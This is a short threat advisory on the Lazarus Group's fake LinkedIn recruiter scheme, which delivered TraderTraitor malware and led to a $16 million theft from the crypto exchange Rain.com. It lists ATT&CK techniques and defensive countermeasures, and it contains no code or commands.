VTA-004501 – Lazarus Group’s LinkedIn Scheme Leads to Major Crypto Theft

In April, the Bahrain-based cryptocurrency exchange Rain.com suffered a significant security breach, resulting in a loss of $16 million in cryptocurrency. The attack was orchestrated by the North Korean hacker group Lazarus, which employed sophisticated social engineering tactics via LinkedIn. Researchers revealed that Lazarus targeted a Rain employee with a deceptive job offer on LinkedIn. The interaction progressed to the point where the employee was tricked into downloading a coding challenge containing the TraderTraitor malware. This malware was instrumental in obtaining the private keys and passwords necessary to access Rain’s crypto wallets.

The FBI, collaborating with Rain, traced part of the stolen funds to WhiteBIT, a cryptocurrency exchange in Lithuania, where they successfully froze approximately $760,000 worth of SOL cryptocurrency. The Lazarus Group is known for using various fake profiles on LinkedIn to pose as recruiters from reputable companies, slowly building trust before moving conversations to other platforms like WhatsApp, Telegram, or Slack, where they deploy their malicious payloads.

Over the years, Lazarus has been linked to multiple high-value thefts from digital asset providers, amassing hundreds of millions in stolen cryptocurrency, which reports suggest may fund North Korea’s nuclear ambitions. LinkedIn has responded by highlighting its efforts to counter state-sponsored activities and promoting safe job hunting practices on its platform.

Severity:
Medium

Attack Surface:
Messaging, Web Application

Tactics:
Credential Access, Execution, Initial Access

Techniques:
T1192: Spearphishing Link
T1204: User Execution
T1056: Input Capture

References:
1. https://www.forbes.com/sites/thomasbrewster/2024/12/04/north-korean-hackers-stole-16-million-from-a-crypto-exchange-through-linkedin/

SuperPRO’s Threat Countermeasures Procedures: 
1) Implement strict verification processes for communication originating from social platforms, particularly job offers.
2) Educate employees about the risks of engaging with unsolicited job offers on social media.
3) Utilize advanced security software that can detect and isolate malware-laden downloads.
4) Establish clear protocols for accessing sensitive systems and data, including multi-factor authentication.
5) Regularly update and train staff on the latest cybersecurity practices and potential threats.
6) Collaborate with cybersecurity experts to monitor and audit internal security measures continuously.

Contributed by: Syaff